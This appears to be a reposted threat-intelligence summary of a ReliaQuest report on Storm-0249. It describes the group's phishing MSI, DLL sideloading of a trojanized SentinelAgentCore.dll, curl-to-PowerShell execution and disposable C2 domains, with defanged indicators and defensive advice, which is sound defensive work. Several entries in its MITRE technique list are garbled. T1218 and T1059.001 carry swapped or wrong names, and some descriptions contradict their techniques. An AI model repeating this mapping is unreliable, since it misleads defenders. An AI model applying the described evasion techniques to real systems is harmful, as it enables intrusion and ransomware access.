Threat Research

Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation

Reliaquest
Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation

Storm-0249 has evolved from mass phishing to targeted post-exploitation operations that weaponize trusted EDR processes—notably abusing SentinelOne’s SentinelAgentWorker.exe via DLL sideloading, fileless PowerShell execution, and Microsoft domain spoofing to hide C2 and reconnaissance. Organizations need behavior-based detection, DNS monitoring for newly registered domains, and automated response playbooks to detect and isolate anomalies like DLL sideloading and curl-to-PowerShell piping before ransomware affiliates exploit pre-staged access. #Storm-0249 #SentinelOne

Keypoints

  • Storm-0249 shifted from mass phishing to precision access brokerage, selling pre-staged access to ransomware affiliates and reducing time-to-ransom.
  • The group abuses legitimate tools and signed EDR processes—using curl-to-PowerShell piping, Microsoft domain spoofing, and DLL sideloading against SentinelAgentWorker.exe—to hide malicious activity as routine telemetry.
  • An MSI delivered via phishing (sgcipl[.]com/us.microsoft.com/…) installs a trojanized DLL (SentinelAgentCore.dll) alongside the legitimate SentinelOne binary, enabling DLL sideloading and SYSTEM-level persistence.
  • After hijacking the EDR process, attackers establish encrypted C2 over TLS to disposable domains and perform reconnaissance (reg.exe, findstr.exe) to collect MachineGuid and other system identifiers for ransomware binding.
  • These techniques neutralize signature-based and reputation-based defenses (newly registered domains, signed binaries) and are adaptable to other EDR vendors, creating cross-industry risk.
  • ReliaQuest recommends behavioral analytics, DNS monitoring for recent domains, limiting/controlling curl.exe and PowerShell workflows, and automated isolation/blocking playbooks to reduce mean time to contain.
  • Standard remediation (reinstalling agents/patching) may fail because MSI-installed, SYSTEM-privileged footholds and sideloaded DLLs can persist across routine fixes.

MITRE Techniques

  • [T1566.001 ] Phishing: Spearphishing Attachment – Used to deliver a malicious MSI from a phishing URL that tricks users into execution (‘user is tricked into running a malicious MSI package downloaded from a phishing URL (sgcipl[.]com/us.microsoft.com/…)’)
  • [T1082 ] System Information Discovery – Attackers ran registry and search utilities under a trusted EDR process to collect system identifiers like MachineGuid (‘the attackers ran commands like reg.exe and findstr.exe to extract system-specific identifiers like MachineGuid’)
  • [T1218 ] Exploit Public-Facing Application – Legitimate signed binaries and utilities (e.g., curl.exe) were weaponized to fetch and pipe scripts, evading detection (‘Curl-to-PowerShell piping to evade traditional detection methods by weaponizing curl.exe’)
  • [T1027 ] Obfuscated Files or Information – Commands and payloads were encoded/obfuscated to hide intent from users and security tools (‘the command appears innocuous but was likely encoded to further obscure its malicious intent from both users and security tools’)
  • [T1059.001 ] Signed Binary Proxy Execution (LOLBins) – Abuse of built-in trusted utilities like curl.exe and PowerShell to execute payloads in-memory and avoid disk-based detection (‘leveraging curl.exe, which IT teams use daily for tasks like downloading updates or testing APIs’, ‘the command pipes the content directly into PowerShell’s memory for immediate execution’)
  • [T1568.002 ] Dynamic Resolution: Domain Generation Algorithms – Use of rapidly registered/disposable domains and domain rotation to evade static blocklists and reputation-based filtering (‘domain rotation strategy evades static blocklists and reputation-based filtering’)
  • [T1203 ] Exploitation for Client Execution – Use of an MSI with SYSTEM privileges to install and execute a trojanized DLL in user context, enabling execution of attacker code (‘The MSI package contains a trojanized DLL impersonating a legitimate SentinelOne EDR component, which is strategically dropped into the user’s AppData folder’)
  • [T1574.002 ] Hijack Execution Flow: DLL Side-Loading – Placing a malicious DLL next to a legitimate signed SentinelOne executable so the legitimate binary loads the attacker’s code (‘When the SentinelOne binary brought along by the attacker launches, it loads the malicious DLL instead of the legitimate one sitting next to it—a technique known as DLL sideloading’)
  • [T1204.002 ] User Execution: Malicious File – Malicious installers and files delivered via social engineering were used to gain initial elevated execution (‘user is tricked into running a malicious MSI package downloaded from a phishing URL (sgcipl[.]com/us.microsoft.com/…)’)
  • [T1486 ] Data Encrypted for Impact – The IAB prepares systems and collects identifiers (MachineGuid) used by ransomware affiliates to bind encryption keys and ensure destructive impact (‘Ransomware groups like “LockBit” and “ALPHV” use MachineGuid to bind encryption keys to individual victim systems’)
  • [T1480.002 ] Mutual Exclusion – Persistence mechanisms and pre-staged access reduce opportunities for remediation and allow long-term footholds (implied by persistence surviving agent reinstalls and updates)
  • [T1112 ] Modify Registry – Attackers query and may modify registry keys as part of reconnaissance or persistence (‘the attackers ran commands like reg.exe … to extract system-specific identifiers like MachineGuid’)
  • [T1552.002 ] Credentials in Registry – Use of registry data to obtain system-specific credentials or identifiers for later use (detection rules flag credentials stored in the registry)
  • [T1547.001 ] Registry Run Keys / Startup Folder – Registry-run keys and startup locations are highlighted as persistence mechanisms to watch (‘Flags the use of the Windows Registry … by adversaries like Storm-0249 for persistence or evasion’)
  • [T1012 ] Query Registry – Routine registry queries by the compromised EDR process were abused to gather target profiling information (‘SentinelAgentWorker.exe constantly generates registry queries as part of its normal operations, creating a noisy environment that forces teams to either tune down alerts or drown in noise’)

Indicators of Compromise

  • [File Hashes ] trojanized files and payloads – 07c5599b9bb00feb70c2d5e43b4b76f228866930 (SentinelAgentCore DLL), 423f2fcf7ed347ee57c1a3cffa14099ec16ad09c (Spear.msi)
  • [File Names ] artifacts dropped by the MSI and sideloaded DLL – SentinelAgentCore.dll, Spear.msi
  • [Domains ] attacker infrastructure and spoofed hosting – sgcipl[.]com (phishing/MSI hosting with /us.microsoft.com/ path), hristomasitomasdf[.]com (C2), krivomadogolyhp[.]com (C2), and other disposable domains
  • [IP Addresses ] malicious infrastructure endpoints – 178.16.52[.]145, 172.67.206[.]124

Read more: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint